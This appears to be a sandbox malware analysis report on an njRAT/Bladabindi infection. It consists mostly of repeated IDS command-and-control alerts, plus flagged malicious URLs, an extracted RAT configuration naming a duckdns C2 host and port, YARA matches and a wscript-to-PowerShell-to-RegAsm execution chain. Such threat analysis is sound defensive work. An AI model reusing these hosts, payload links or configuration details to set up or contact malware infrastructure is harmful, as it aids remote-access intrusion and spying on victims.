2024-09-24T23:43:28.528027+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.533513+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.594349+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.604145+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.710877+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.717516+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.759578+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.764481+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.783239+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.788142+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.799137+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.803986+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.809192+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.814040+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.819026+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.827339+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.832212+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.837105+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.846874+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.851786+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.857542+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.862461+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.867519+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.872424+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.877351+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.882331+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.887407+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.892222+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.897183+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.903094+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.907995+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.912929+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.922512+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.927408+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.932640+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.937535+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.942495+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.947467+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.952492+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.960206+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.965153+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.974040+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.979034+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.983941+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.990473+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.995400+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.019599+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.024470+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.030352+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.035210+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.040305+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.045233+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.050242+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.056778+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.061704+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.066944+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.071770+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.077268+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.084949+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.089881+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.094780+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.099687+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.104722+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.111648+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.116486+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.121361+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.126408+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.131320+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.138391+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.143468+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.148521+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.153558+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.159422+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.164473+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.171923+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.178235+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.183239+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.188057+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.192942+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.197816+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.206278+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.211298+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.216415+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.222769+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.227690+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.234508+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.239434+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.244394+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.253771+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.261440+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.271520+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.276556+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.296602+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.301512+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.336453+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.365146+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.374403+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.379547+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.385443+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.411311+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.416290+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.421134+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.426067+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.431122+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.436029+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.440890+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.446154+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.451136+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.456217+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.462761+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.467772+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.472832+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.477695+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.482599+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.488589+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.493429+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.498333+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.503224+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.510389+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.516863+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.521699+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.526568+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.531410+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.538302+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.544650+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.551451+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.558176+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.563156+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.568017+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.574246+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.579413+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.584766+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.589663+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.612118+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.616991+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.621931+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.629480+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.634321+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.641756+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.646624+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.654255+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.659347+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.664384+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.696786+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.701969+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.706950+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.712803+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.717756+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.723112+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.728150+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.733043+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.737966+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.745380+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.750254+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.755086+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.759944+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.764884+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.770175+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.775157+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.795804+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.802249+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.834732+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.847551+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.891818+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.901106+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.930283+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.935245+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.940260+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.945085+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.949996+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.978200+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.993522+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.000208+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.005502+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.011799+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.017105+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.022324+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.027880+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.058638+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.537958+0200	2825564	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP

ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-24T23:42:24.543018+0200	2825563	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP

ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity Sending Screenshot (CAP)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-24T23:43:09.823180+0200	2825565	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:13.222752+0200	2825565	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:20.048232+0200	2825565	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:22.955511+0200	2825565	1	Malware Command and Control Activity Detected	192.168.2.5	56145	46.246.14.5	2054	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://ftp.desckvbrat.com.br	Avira URL Cloud: Label: malware
Source: https://pastebin.com/raw/pQQ0n3eA	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Njrat {"Host": "notificadoresrma.duckdns.org", "Port": "2054", "Campaign ID": "NYAN CAT", "Network Seprator": "@!#&^%$", "Registry": "a388ab2ca3be4"}

Yara detected Njrat

Source: Yara match	File source: 23.2.powershell.exe.20958f44b38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 76.76.21.22:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:56146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:56147 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:56145 -> 46.246.14.5:2054
Source: Network traffic	Suricata IDS: 2825563 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (inf) : 192.168.2.5:56145 -> 46.246.14.5:2054
